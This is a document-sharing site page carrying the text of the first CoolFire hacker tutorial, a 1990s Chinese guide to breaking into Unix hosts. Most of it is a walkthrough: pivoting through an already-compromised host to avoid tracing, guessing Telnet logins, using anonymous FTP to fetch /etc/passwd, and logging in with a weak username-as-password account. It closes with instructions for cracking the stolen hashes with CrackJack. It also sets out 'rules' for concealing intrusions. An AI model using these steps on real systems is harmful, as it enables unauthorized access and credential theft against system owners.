会员注册 | 登录 | 微信快捷登录 支付宝快捷登录 QQ登录 微博登录 | 帮助中心 人人文库renrendoc.com美如初恋!
站内搜索 百度文库

热门搜索: 直缝焊接机 矿井提升机 循环球式转向器图纸 机器人手爪发展史 管道机器人dwg 动平衡试验台设计

   首页 人人文库网 > 资源分类 > DOC文档下载

coolfire黑客入门教程系列之(一).doc

  • 资源星级:
  • 资源大小:44.50KB   全文页数:9页
  • 资源格式: DOC        下载权限:注册会员/VIP会员
您还没有登陆,请先登录。登陆后即可下载此文档。
  合作网站登录: 微信快捷登录 支付宝快捷登录   QQ登录   微博登录
友情提示
2:本站资源不支持迅雷下载,请使用浏览器直接下载(不支持QQ浏览器)
3:本站资源下载后的文档和图纸-无水印,预览文档经过压缩,下载后原文更清晰   

coolfire黑客入门教程系列之(一).doc

CoolHCVolume1ByCoolFire这不是一个教学文件,只是告诉你该如何破解系统,好让你能够将自己的系统作安全的保护,如果你能够将这份文件完全看完,你就能够知道电脑骇客们是如何入侵你的电脑,我是CoolFire,写这篇文章的目的是要让大家明白电脑安全的重要性,并不是教人CrackPassword若有人因此文件导致恶意入侵别人的电脑或网路,本人概不负责1甚麽是Hacking就是入侵电脑有甚麽好解释的大部份有关介绍Hacker的书籍或小说及文件等都有清楚的介绍,沉迷於电脑的人...破坏...唉一大堆怪解释就是了,最好不要成为一个骇客,我...不是2为甚麽要Hack我们只是为了要了解更多关於系统的技术,入侵它,了解它是如何运作的,试试它的安全性,然後学著去使用它,读取系统中有关操作的说明,学习它的各项操作为了安全性而作革命3Hack守则1.不恶意破坏任何的系统,这样作只会给你带来麻烦.恶意破坏它人的软体将导致法律刑责,如果你只是使用电脑,那仅为非法使用注意千万不要破坏别人的软体或资料2.不修改任何的系统档,如果你是为了要进入系统而修改它,请在答到目的後将它改回原状.3.不要轻易的将你要Hack的站台告诉你不信任的朋友.4.不要在bbs上谈论你Hack的任何事情.5.在Post文章的时候不要使用真名.6.正在入侵的时候,不要随意离开你的电脑.7.不要侵入或破坏政府机关的主机.8.不在电话中谈论你Hack的任何事情.9.将你的笔记放在安全的地方.10.想要成为Hacker就要真正的Hacking,读遍所有有关系统安全或系统漏洞的文件英文快点学好11.已侵入电脑中的帐号不得清除或修改.12.不得修改系统档案,如果为了隐藏自己的侵入而作的修改则不在此限,但仍须维持原来系统的安全性,不得因得到系统的控制权而将门户大开13.不将你已破解的帐号分享与你的朋友.4破解之道1.进入主机中2.得到/etc/passwd3.得到系统帐号4.得到最高权限How1.进入主机有好几种方式,可以经由TelnetPort23或SendMailPort25或FTP或WWWPort80的方式进入,一台主机虽然只有一个位址,但是它可能同时进行多项服务,所以如果你只是要进入该主机,这些Port都是很好的进行方向.当然还有很多Port,但是DayTime的Port你能拿它作甚麽我不知道,你知道吗底下的示范并不是像写出来的那麽容易,只不过是要让你了解如何进入,当然其中还有很多问题,如打错指令......等等的毛病...没有出现在课堂上,但是我为了面子....一定要删掉这些不堪入目的东西嘛...示范进入主机的方法ByCoolFire首先要先连上某一台你已经有帐号的Telnet主机,当然最好是假的,也就是Crack过的主机,然後利用它来Crack别的主机,才不会被别人以逆流法查出你的所在DigitalUNIXms.hinet.netttypaloginFakeNamePasswordLastloginMonDec2032400from255.255.0.0我用的是ms.hinet.net...当然是假的罗,都已经经过修改了啦没有这一台主机啦别怕别怕以下的主机名称都是假的名称,请同学们要记得DigitalUNIXV1.2CRev.248MonOct31212302CST1996DigitalUNIXV1.2CWorksystemSoftwareRev.248DigitalUNIXChineseSupportV1.2Crev.3嗯...进来了开始攻击吧本次的目标是......ms.hinet.nettelnetwww.fkyou.hinet.netTelnet试试看....Trying111.222.255.255...Connectedtocool.fkyou.hinet.net.Escapecharacteris.PasswordLoginincorrect没关系,再来coolloginhinetPasswordLoginincorrectcoollogin都没猜对,这边用的是猜的方法,今天运气好像不好telnetcloseConnectionclosed.重来,换个Port试试看ms.hinet.nettelnet111.222.255.25580Trying111.222.255.255...Connectedto111.222.255.255.Escapecharacteris.ErrorError400InvalidrequestunknownmethodCERNHTTPD3.0AConnectionclosedbyforeignhost.哇哩连密码都没得输入,真是.....再来要有恒心换FTPPort试试ms.hinet.netftp111.222.255.255Connectedto111.222.255.255.220coolFTPserverVersionwu2.41TueAug8155043CDT1995ready.Name111.222.255.255FakeNameanonymous331Guestloginok,sendyourcompleteemailaddressaspassword.Password230Welcome,archiveuserThisisanexperimentalFTPserver.Ifhaveany230unusualproblems,pleasereportthemviaemailtorootcool.com230Ifyoudohaveproblems,pleasetryusingadashasthefirstcharacter230ofyourpasswordthiswillturnoffthecontinuationmessagesthatmay230beconfusingyourftpclient.230230Guestloginok,accessrestrictionsapply.RemotesystemtypeisUNIX.Usingbinarymodetotransferfiles.哇可以用anonymous进来耶password部份输入aaa就好了不要留下足迹喔ftpls200PORTcommandsuccessful.150OpeningASCIImodedataconnectionforfilelist.etcpubusrbinlibincomingwelcome.msg226Transfercomplete.嗯嗯...太好了进来了下一个目标是.....ftpcdetc250CWDcommandsuccessful.ftpgetpasswd抓回来200PORTcommandsuccessful.150OpeningBINARYmodedataconnectionforpasswd566bytes.226Transfercomplete.566bytesreceivedin0.56seconds0.93Kbytes/s喔...这麽容易吗ftpcatpasswd看看root00root/root/bin/bashbin11bin/bindaemon22daemon/sbinadm34adm/var/admlp47lp/var/spool/lpdsync50sync/sbin/bin/syncshutdown60shutdown/sbin/sbin/shutdownhalt70halt/sbin/sbin/haltmail812mail/var/spool/mailnews913news/var/spool/newsuucp1014uucp/var/spool/uucpoperator110operator/root/bin/bashgames12100games/usr/gamesman1315man/usr/manpostmaster1412postmaster/var/spool/mail/bin/bashftp4041/home/ftp/bin/bash哇哩...是Shadow的...真是出师不利....ftpbye221Goodbye.不信邪....还是老话,要有恒心....FTP不行,再Telnet看看ms.hinet.nettelnetwww.fkyou.hinet.netTrying111.222.255.255...Connectedtocool.fkyou.hinet.net.Escapecharacteris.PasswordLoginincorrect又猜错coolloginfkyouPasswordLastloginMonDec2092007from205.11.122.12Linux1.2.13.Someprogramminglanguagesmanagetoabsorbchangebutwithstandprogress.cool哇哈哈哪个笨root,用systemname作username连password也是systemname....总算...没白玩...coolsystembashsystemcommandnotfound嗯...这个user的权限好像不大....coollscoolpwd/home/fkyoucoolcd/cool/lsPublic/cdrom/lib/mnt/tmp/www/READMEdev/linuxproc/usr/bin/etc/local/root/var/boot/home/lostfound/sbin/cool/cdetctelnetquit好想睡呀不玩了下节课再开始....Connectionclosed.ms.hinet.netexit走了下节课在见啦今天就上到这里老师要先下班了有学生说骗人还没有破解呀胡说不是已经进来了吗看看这节课上的是甚麽进入主机嗯.....How2.上节课抓回来一个乱七八糟的/etc/passwd,你以为我的真那麽笨吗guest所抓回来的能是甚麽好东西所以这一节课继续上次的攻击行动.上节课我们已经猜到了一个不是guest的username及password.今天就以它来进入主机瞧瞧DigitalUNIXms.hinet.netttypaloginFakeNamePasswordLastloginMonDec2032400from255.255.0.0DigitalUNIXV1.2CRev.248MonOct31212302CST1996DigitalUNIXV1.2CWorksystemSoftwareRev.248DigitalUNIXChineseSupportV1.2Crev.3嗯...进来了开始攻击吧本次的目标是.....呵...ms.hinet.nettelnetcool.fkyou.hinet.netTelnet试试看....昨天的位址,有作笔记吧stsvr.showtower.com.twtelnetcool.fkyou.hinet.netTrying111.222.255.255...Connectedtocool.fkyou.hinet.net.Escapecharacteris.PasswordLoginincorrectcoolloginfkyouPassword一样输入fkyouLastloginMonDec1124410fromms.hinet.netLinux1.2.13.coolcd/etccool/etclsDIR_COLORSftpuserslocaltimeresolv.confHOSTNAMEgatewaysmagicrpcNETWORKINGgroupmail.rcsecurettyNNTP_INEWS_DOMAINhost.confmotdsendmail.cfX11hostsmessages/sendmail.stXF86Confighosts.allowmtabservicesat.denyhosts.denymtoolsshellsbootptabhosts.equivnamed.bootshutdownpcsh.cshrchosts.lpdnetworkssnoopy/csh.loginhttpd.confnntpserverslip.hostsexportsinetd.confpasswdsnooptabfastbootinittabpasswd.OLDsyslog.conffdprmissuepasswd.oldsyslog.pidfstabld.so.cacheprintcapttysftpaccessld.so.confprofileutmp找寻目标.....太乱了懒得找,再来....cool/etclspapasswdpasswd.OLDpasswd.old果然在cool/etcmorepasswd看看有没有Shadow...rootacqQkJ2LoYp00root/root/bin/bashjohn234ab56999913JohnSmith/home/john/bin/john正点一点都没有防备cool/etcexitlogout走了....换FTP上场Connectionclosedbyforeignhost.ms.hinet.netftpwww.fkyou.hinet.netConnectedtocool.fkyou.hinet.net.220coolFTPserverVersionwu2.41TueAug8155043CDT1995ready.Namewww.fkyou.hinet.net66126fkyou331Passwordrequiredforfkyou.Password230Userfkyouloggedin.RemotesystemtypeisUNIX.Usingbinarymodetotransferfiles.ftpcd/etc250CWDcommandsuccessful.ftpgetpasswd200PORTcommandsuccessful.150OpeningBINARYmodedataconnectionforpasswd350bytes.226Transfercomplete.350bytesreceivedin0.68seconds1.9Kbytes/sftpcatpasswdrootacqQkJ2LoYp00root/root/bin/bashjohn234ab56999913JohnSmith/home/john/bin/john看看呵假不了......ftpbye221Goodbye.ms.hinet.netexit闪人罗下课....喔慢点,还有事要说明......passwd的Shadow就是把passwd放在shadow档中,而你原先在第一节课所看到的这个格式的passwd并不是真正的passwd....root00root/root/bin/bash因为密码的部份没有东西....所以拿了也没有用但这一节课所拿到的东西呢,像是这样,有几点需要说明的,就是它究竟代表著甚麽john234ab56999913JohnSmith/home/john/bin/sh它以分成几个栏位,各栏位对照如下UserNamejohnPassword234ab56UserNo9999GroupNo13RealNameJohnSmithHomeDir/home/johnShell/bin/sh了了吧了了吧保留著你千辛万苦所拿到的passwd,咱们第三节课再来告诉各位如何使用CrackJack把passwd解码....呵呵...zzZZzZzz...CrackJackV1.4中文使用说明ByCoolFire1211996嗯...该到第三课了累了的同学先去喝口水吧这一节课咱们来说说CrackJack这可是个解读/etc/passwd的好工具喔,不要告诉我你习惯用Brute,拿Brute跟CrackJack的速度比比看,包准你马上投向CrackJack1.4的怀抱,但请先确定你所使用的是CrackJack1.4,你可以在CoolFire的HackerMailerPage中拿到这个版本的CrackJack这才是真正有用的版本,速度...对...就是这点别人都比不上但还是要讲讲它的缺点...就是只能在DOS跟OS2中跑,如果在Windoz95上开个DOSMode跑,它可是连理都不会理你的OK现在切入正题etc/passwd拿到手了吧开始罗使用CrackJack1.4前所需要的东西有这些1CrackJack1.4废话...2/etc/passwd档案,你可以在Unix系统中的/etc/目录中找到passwd3字典档哪里找,自己敲...呵ClayMore中有一份DIC.TXT是有一千多个字的字典,但比起我的字典可就小巫见大巫了,LetMeIn1.0里面也有,听James说2.0Release的时候会有更棒的字典档含入,期待吧....使用CrackJack1.4前需先确定你所使用的机器是386含以上CPU的然後最好有充足的记忆体开始Jack时只要敲入JACK即可,它会问你PWName...输入你的passwd档名,DictionaryName输入你的字典档名,Jack就会开始找了找到时会告诉你,也会在JACK.POT中写入它所找到的密码但...有点怪的格式如果找到的是具root权限的密码,Jack会告诉你ThisisJackAss...嗯...说脏话了因为使用Jack占用的时间实在太多,如果你中途想要停掉时只要按下CtrlC即可,别以为你前功尽弃了因为Jack有个Restore的功能,中断时会自动存档为RESTORE,下次要继续这次的寻找只要输入JackRestoreRESTORE即可当然你也可以为你的Restore重新命名Jack也会找得到的...如Renrestorerestore.HNT之後要再寻找的时後就JackRestoreRESTORE.HNT即可...Jack会很自动的Restore前次所寻找的字串...继续帮你找下去....字典档哪里找我的不给你可以找别的BruteForce之类的程式,有些里面会附,或是找找其它的Hacker地下站看看有没有,自己编一个,或找个英汉字典软体将字典的部份解出来,可能要有一点资料栏位及写程式的基础.这一节课没有范例成功的案例找到过某家网路咖啡店的root权限密码Jack好正点呀所花的时间20分钟左右...但也有找了一两天也找不到的.....呜...骇客们加油吧最近比较没空了因为要赶其它的报告,HomePage也没有太多时间整理,更别说是写这些说明了,但是太多网友需要,我只好两肋插刀...差点昨天就交不出报告了如果你有兴趣写其它程式的中文说明,请完成後寄一份给我,我将它放在HomePage上面让其它人参考,当然你也可以给我你的使用心得,让别人参考看看也行另外CoolFire目前准备收集一系列的SystemHoleList,如果你在其它的站台有看到的,请把它先Cut下来,Mail一份给我这样我才能弄出一份更齐全的东西呀....还有...在想弄个MailList...唉..不想这麽多了有空再说吧再次重申,Crack别人站台之後不要破坏别人站台中的资料,此篇文章仅作为教育目的,不主张你随便入侵他人主机....当然高Net除外,我恨死它了...请勿将这类技术使用於破坏上又.....如果第三次世界大战开打,你可以任意破坏敌国的电脑网路...我全力支持,最严重的情况如果你真的很讨厌该主机的话...就将它ShutDown....好了别太暴力了

注意事项

本文(coolfire黑客入门教程系列之(一).doc)为本站会员(baixue100)主动上传,人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对上载内容本身不做任何修改或编辑。 若此文所含内容侵犯了您的版权或隐私,请立即通知人人文库网([email protected]),我们立即给予删除!

温馨提示:如果因为网速或其他原因下载失败请重新下载,重复下载不扣分。

copyright@ 2015-2017 人人文库网网站版权所有
苏ICP备12009002号-5